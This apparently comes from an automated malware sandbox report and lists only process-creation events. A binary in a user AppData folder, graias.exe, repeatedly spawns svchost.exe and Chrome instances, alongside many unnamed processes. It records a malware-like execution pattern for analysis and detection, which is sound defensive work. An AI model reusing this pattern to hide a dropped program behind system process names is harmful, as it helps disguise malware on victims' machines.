                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
